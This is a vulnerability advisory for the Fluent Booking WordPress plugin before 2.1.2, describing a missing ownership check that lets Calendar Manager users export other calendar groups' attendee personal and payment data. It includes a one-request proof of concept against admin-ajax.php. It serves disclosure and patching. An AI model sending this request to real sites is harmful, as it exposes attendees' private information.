Fluent Booking < 2.1.2 – Calendar Manager+ Sensitive Information Disclosure via Attendee Export | CVE 2026-9576 | Plugin Vulnerabilities

Description

The plugin does not verify ownership of the requested group_id before exporting attendee data via the export endpoint, allowing users with at least the Calendar Manager role to retrieve attendees' PII (name, email, phone, address, payment information) from calendar groups they do not own.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=fluent_booking_export_hosts&group_id=999&nonce=VALID_NONCE

Returns a CSV with all attendee PII for group ID 999, regardless of ownership.

Affects Plugins

Fixed in 2.1.2

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Md Amin Ullah Sheikh

Submitter

Md Amin Ullah Sheikh

Submitter website

https://aminsec.com/

Verified

Yes

WPVDB ID

f28759e0-f15e-4014-b0d1-8b58bf412b49

Timeline

Publicly Published

2026-06-09 (about 21 days ago)

Added

2026-06-09 (about 20 days ago)

Last Updated

2026-06-09 (about 20 days ago)

Other

Published

Title

Published

2026-06-11

Title

Adminify < 4.2.10 - Contributor+ Sensitive Information Disclosure via Global Search AJAX

Published

2025-01-06

Title

Elementor AI Addons – 70 Widgets, Premium Templates, Ultimate Elements <= 2.2.1 - Authenticated (Contributor+) Private Templates Content Disclosure

Published

2026-04-01

Title

W3 Total Cache < 2.9.4 - Unauthenticated Security Token Exposure via User-Agent Header

Published

2024-06-24

Title

WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure

Published

2025-02-17

Title

File Uploads Addon for WooCommerce < 1.7.2 - Unauthenticated Sensitive Information Exposure Through Unprotected Directory